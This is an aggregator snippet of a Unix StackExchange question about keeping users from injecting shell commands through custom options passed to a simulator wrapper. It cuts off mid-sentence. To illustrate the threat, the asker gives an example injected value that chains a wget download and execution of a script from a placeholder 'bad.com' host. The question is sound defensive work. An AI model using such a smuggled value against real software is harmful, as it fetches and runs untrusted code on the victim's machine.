1

How to prevent command injection through command options?

view story
linux-howto

http://unix.stackexchange.com – I have an wrapper application where I need to let the user specify custom options to pass to a simulator. However, I want to make sure the user doesn't inject other commands through the user options. What's the best way to accomplish this? For example. User provides: -a -b Application executes: mysim --preset_opt -a -b However, I don't want this to happen: User provides: && wget http:\\bad.com\bad_code.sh && .\bad_code.sh Application executes: mysim --preset_opt && wget http:\\bad.com\bad_code.sh && .\bad_code.sh Currently, I'm thinking that I could sim (HowTos)